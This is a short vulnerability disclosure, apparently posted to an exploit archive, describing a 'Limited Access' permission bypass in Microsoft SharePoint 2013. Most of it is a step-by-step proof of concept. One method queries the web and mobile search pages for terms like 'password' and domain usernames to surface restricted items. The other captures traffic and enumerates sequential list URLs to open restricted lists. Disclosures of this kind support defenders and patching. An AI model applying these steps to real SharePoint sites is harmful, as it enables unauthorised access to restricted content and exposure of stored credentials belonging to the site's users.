vulnerability Title: Microsoft SharePoint 'Limited Access' Permission Bypass This vulnerability was discovered by 'Behnam Vanda' January 07, 2018 ====================== I. About Vulnerability ====================== A permission level bypass vulnerability has been identified in microsoft sharePoint 2013 & maybe prior. This vulnerability allows attackers to open or view restricted items in the site or library. An authenticated user can bypass 'Limited Acces' permission to browse a site page or library to access a specific content item that was restricted. ====================== II. Exploit ====================== #POC 1 : 1. Search for specific words inside web & mobile sharepoint search box: "password" "pass" "user" "domain\user" "name | lastname" & etc [~] web search : http://site/BSearch/results.aspx [~] mobie search : http://site/_layouts/mobile/MobileResults.aspx example : http://site/BSearch/results.aspx?k=password example : http://site/BSearch/results.aspx?k="NSA\1377" example : http://site/_layouts/mobile/MobileResults.aspx?k=pass example : http://site/_layouts/mobile/MobileResults.aspx?k=BOB 2. The page shown some of sharepoint's search results like restricted specific item,site,library urls 3. so click at the urls to access|viwe|read site page and other restricted library and items -------------------------------------- #POC 2 : after capturing packets between our system and sharepoint site (use fiddler or brupsiute , wireshark , etc) We have access to items,list,pages,sites urls like as the following : http://site/IT/Lists/List70/AllItems.aspx so access to restricted items & lists by make /LIST#/ urls. for example : http://site/IT/Lists/List100/AllItems.aspx http://site/IT/Lists/List101/AllItems.aspx http://site/IT/Lists/List102/AllItems.aspx ====================== III. Affected Systems Microsoft SharePoint 2013 & maybe prior ====================== ---------------------- Behnam Vanda [redhathackers] E-Mail: beni[dot]vanda[at]gmail.com